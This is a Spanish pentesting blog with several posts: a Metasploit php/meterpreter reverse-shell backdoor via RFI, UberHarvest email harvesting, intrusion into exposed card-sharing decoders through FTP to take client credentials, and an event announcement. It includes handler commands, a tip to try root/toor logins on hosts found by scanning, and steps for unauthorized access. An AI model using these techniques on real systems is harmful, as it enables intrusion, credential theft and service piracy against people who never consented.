Metasploit...creando backdoor php

Ya hemos hablado varias veces en este blog sobre las virtudes del señor Metasploit con la seria Ex girlfriend.

Hoy vamos a jugar un poco a los indios y vaqueros.
Seguro que conoces los términos LFI (Local File Inclusion) y RFI ( Remote File Inclusion). Una mala configuracion de nuestras aplicaciones y permisos en los servidores web puede ocasionar el acceso local o remoto de un atacante a ciertas rutas en el servidor.
Cuando encontramos dicha vulnerabilidad, tenemos la posibilidad de subir una shell, pero OJO como dejamos esto con nuestros clientes de PenTest, tal y como comentaba el señor Chema Alonso
Podemos subir "la madre de las shell´s", osea, una conexión reversa ( y tenebrosa xD) hacia nuestra máquina metasploit, y usar meterpreter para intentar comprometer el servidor por completo.

Para ello, jugamos con Metasploit y ponemos a la escucha el manejador del payload.
use Multi/handler
set PAYLOAD php/meterpreter/reverser_tcp
set LHOST ip local ( no pongas 127.0.0.1 como en todos los manuales si quieres probarlo hacia fuera, el mundo real xD )
Exploit -z -j

ya tenemos el payload a la escucha. Como no hemos configurado LPORT, por defecto estamos escuchando sobre el puerto 4444.  (***aunque no tenga nada que ver, habéis probado a escanear máquinas con este puerto abierto+ ssh y probar a entrar con u:root/p:toor ? ***)

Ahora vamos a crear la shell.

Como veis, inicio también el servidor apache, que hará las veces de servidor vulnerable a RFI.

En cualquier equipo, entramos a la dirección del servidor, en este caso de demo, 192.168.0.119/kinopepino.php
y ya tenemos sesión en meterpreter.

Como podéis ver, la sesión meterpreter haciendo uso de SHELL nos muestra acceso a la ruta del backdoor/shell.
Para estas pruebas he usado el usuario root para arrancar el servicio de apache, entonces, cualquier persona que acceda a dicha shell, tendrá acceso completo a todo el sistema, o al menos a la parte del root xD. Un ejemplo gráfico de la necesidad de correr los servicios con usuarios pelados, y el uso de ACL´s a nivel de disco para evitar estos incidentes. También sería interesante correr el Apache en modo Jail (like freebsd) para aislar no solo permisos, sino comandos del sistema por ejemplo. No confíes solo en el Htaccess...

Como siempre, gracias por leerme !!!

TURNkey... el badoo de las máquinas virtuales

Seguro que todos los días lees información de vulnerabilidades sobre "empaquetados" como wordpress, joomla, drupal, etc etc etc. Muchas veces nos entra la pereza a la hora de montar una máquina virtual con todo el "software que corre por debajo" como son los servidores web, bbdd, aplicaciones, ficheros o incluso el sistema operativo.
La gente de TURNKEY nos pone a disposición toda una seria de VMachines listas para andar con todo tipo de "empaquetados".
No creo que sea muy recomendable montar ninguna de estas máquinas para su uso en producción, pero si lo que quieres es jugar o romperlas xD, sin duda es una opción muy cómoda.
Espero que disfrutéis mucho con estas máquinas.

Por otro lado, recordar que tengo puesto en marcha la página para el proyecto de pentest colectivo  donde estoy recopilando artículos que considero interesantes, en CASTELLANO, para realizar las pruebas de intrusión que tanto nos gustan.
Si quieres aparecer, si quieres desaparecer, si tienes algún post por ahí escondido el cual revisas cuando haces tus auditorías.. Te animo a que participes.

gracias a todos por leerme !!! buen domingo !!!!
si lees esto el lunes, es que SI pasaste un buen domingo lejos de la informática xD.

Uberharvest...olfateandooooo webs

Hace un tiempo que publiqué la entrada sobre Harvester para "cosechar" correos en el world wide web xD

Hoy voy a hablaros de UberHarvest. La madre del cordero, compralo !!!
Ubicado en una ruta un tanto peculiar en Backtrack 5 r3

- Busca de direcciones de correo electrónico desde un sitio web o muchos a la vez
- Consigue sitio web de destino del nombre de dominio, IP del dominio y la ubicación geográfica
- Scan sitio web de destino para el correo de Exchange (MX) Dirección de servidores IP.
- Probar si los servidores de destino MX son open-relay server
- Obtener la versión del servidor web de destino y X-Powered-por de la cabecera
- Información Harvest usando técnicas de evasión a través del uso de proxy anónimo y los diferentes agentes de usuario.
- Obtener los dominios de destino del servidor del motor de búsqueda Google
- Utilice la flecha hacia arriba para reutilizar entrada antigua para aumentar la eficiencia del tiempo
- Imprima los resultados en formato XML y XSL hojas de estilo.
- Cosecha de los números de teléfono de la página web principal y consulte con Amarillo-Pages.com por teléfono listado, la dirección y el nombre del negocio.
- Obtener certificados Secure Socket Layer información.
- Recibir información de WHOIS
- Recibir información ARIN
- Utilice Google para excavar en busca de más vínculos en caché
- Huella WordPress Blogs
- Huella Drupal Blogs

Vamos a tocar el piano. uberharvest -u lo primero de todo para actualizarlo. No actualiza bien desde la linea de comandos, creo que por un problema con la ruta de la carpeta de destino, por lo que me ha tocado bajarme el tar y volver a instalarlo.
 bzip2 -cd uberharvest.tar.bz2 | tar xvf -
cd
./setup

uberharvest -m   nos lanza un menú interactivo, cada vez mas cerca el mundo linux de los wizards de windows xD. Si queremos usar un proxy anti-jail xD podemos añadir -p ip. Si queremos despistar un poco mas a la víctima, podemos añadir el parámetro -random para cambiar los user-agents ( la identificación de los navegadores para que los servidores web puedan manejar ciertos comportamientos, por ejemplo, cuando entras desde un móvil a una web, que se abre en modo "mobile").

Empieza preguntándonos la url víctima.

Las preguntas son muy obvias, encontrar correos con @ el dominio dado, o cualquier correo. Guardar a disco o salida por pantalla. Buscar solo en la web del dominio pasado, o que aplique recursividad y busque a su vez en los dominios encontrados (hasta donde llegará? hasta el infinito) pero nos pregunta.
Como he empezado el post, también nos muestra los datos del servidor.

Otra opción para mi interesante sin duda es la posibilidad de pasarle un fichero con direcciones "víctima". cambiamos al directorio "vault" y editamos el fichero website.txt. Para usarlo basta con llamar al programa con el modificador -l. También podemos indicarle que nos tire los resultados a un fichero xml formateado.

 Espero que os guste y como siempre, gracias por leerme !!!.

Hackers hackeados...Card Sharing

No es tan abochornante como lo que comentaba el maligno en su post sobre un Hacker ruso pillado por la webcam pero me hace gracia que la gente se meta donde no le llaman, con acciones ilegales.

El asunto es muy sencillo. Imagino que muchos conocéis la "técnica" de Card Sharing. No voy a profundizar sobre este tema, ya que es ilegal, y me parece poco decoroso hablar sobre esto aquí. Aunque no lo creais, aquí se habla de inseguridad para conseguir seguridad...
A grandes rasgos, el Card Sharing esta basado en que un cliente de alguna plataforma de contenidos digitales, como puede ser Digital + con su tarjeta de claves (keys) y un deco, generalmente Dreambox ( basado en linux) comparte las claves de encriptación con equipos por internet. Es decir, que un amigo paga la cuota, y comparte claves con n amigos. Hay incluso gente que te ofrece por una cuota baja, 10 €, conectarte a dicho decodificador con todos los canales disponibles. Me parece patético esto, ya que piratear por ver la tele...

Entonces, por qué os hablo de esto? porque la gente lo monta y no tiene ni idea.
Lo típico, gente que se mete a manifacero, lee un manual, y como no le anda muy bien, deja lo de cambiar las claves para luego.

Es curioso que buscando en 4096 equipos en rangos de direcciones, la mayoría de Polonia, no encontré más que 1 decodificador. Puede que le hayan cambiado los puertos, cosa recomendable si lo usas, pero lo dudo.
Sin embargo, con ese mismo número de equipos en España, había más de 100 equipos. Así nos va en España, somos unos piratas ( pero no de los buenos, de los que hacen daño a la Industria...)

Como se detectan estos aparatos, pues suelen estar configurados para atender comunicaciones servidor/cliente mediante el puerto 160001 y en algunos decos 12000. Si a esto le sumamos la posibilidad de que tengan el ftp del decodificador publicado en la dmz, o redirigido, pues ya podemos probar.

Como podéis ver en esta imagen, como no toman las medidas de seguridad oportunas cuando se publican/ofrecen servicios en Internet, puedo ver los nombre de usuarios e ip de los clientes conectados, incluso el canal que están viendo en ese momento.

Si seguimos profundizando, nos metemos en el ftp del dreambox del servidor, y descargamos el fichero de configuración con todas las ip´s, usuarios y claves de los clientes.

De esta manera, podríamos configurar nuestro decodificador para obtener estos servicios gratuitamente.
Es curioso porque como la mayoría de los mortales tienen ip´s dinámicas, usan servicios de dns gratuitos tipo dyndns y demás, por lo que haciendo google hacking con esos nombres de dominios, podemos incluso geolocalizar la vivienda del "juacker".

Entonces, con ip´s de gente que comete las infracciones, con ip de la persona que se lucra con esto, no hay nadie que investigue esto. Luego si tu asesoras a una empresa sobre vulnerabilidades, si no caes en gracia, se te cae el pelo ( para los que aún os queda !!!). La vida es así.

Como siempre, gracias por leerme, y espero que no pirateéis esos servicios, y si lo hacéis, lo hagáis bien.
Como siempre, cambiar puertos, técnica anti-fingerprint ( borrar el banner del ftp? ) y sobre todo, USUARIOS Y CONTRASEÑAS ROBUSTAS !!!.

PD: Después de varios comentarios, quiero añadir otro post de la gente de Security By Default de hace unos años, en el que también mencionaban este asunto, pero realizaban las búsquedas por Shodan.
http://www.securitybydefault.com/2010/08/pirateando-al-pirata-television-de-pago.html Google +

Charlas Navaja Negra. Seguridad. Albacete.España.

El motivo del post de hoy es informaros de un evento que me parece muy interesante publicitar, y para ser sinceros, hacer un poco de ego-spam.

El 30 de noviembre( viernes tarde) y el 1 de diciembre (sábado mañana) se celebra en Albacete las segunda conferencia NAVAJA NEGRA.

Hace unos meses se celebró la primera, y creo que todos los que asistimos nos quedamos encantados con lo que allí se presentó. Honeypots, hardening/anti-fingerprint, Hacking en IPV6, desarrollo web seguro, leyes, etc.

Bajo mi punto de vista, lo más importante de estos eventos es el "social-networking" que se realiza, ya que podemos hablar directamente con la gente que escribe los artículos, intercambiar experiencias, dudas, todo eso con unos coffe&cigarretes. A veces se aprende mas en una conversación de 5 minutos, que en un manual, o al menos, el manual siempre estará ahí, y la oportunidad de reunirse con colegas del sector, pues no la tenemos todos los días. Termino la parte sentimental.

Para esta segunda conferencia se han buscado temas de lo mas dispares.
Mi presentación, From mail to jail: Exploit your ex-girlfriend, pretende mostrar a los asistentes los pasos para realizar un pentest, y como "darle forma" a todas esas técnicas, herramientas, procesos, etc que leemos a diario, pero que mucha gente no sabe "materializar" en un Pentest.
Se van a presentar charlas de ingeniería inversa, Android, Hash, Appliances vulnerables, Exploit´s y malware, comunicaciones móviles, Ipv6 visto por un IDS etc.
Todas las charlas aquí.

Para la gente que se desplaza desde fuera de Albacete, hay un descuento del 30% en los servicios de RENFE, y una oferta muy interesante para pernoctar el viernes allí. Animaros en asistir y participar en esta evento !!!!!

Sinceramente me parece muy interesante esta segunda conferencia NAVAJA NEGRA y os animo a que realicéis la inscripción. Hay plazas limitadas !!!!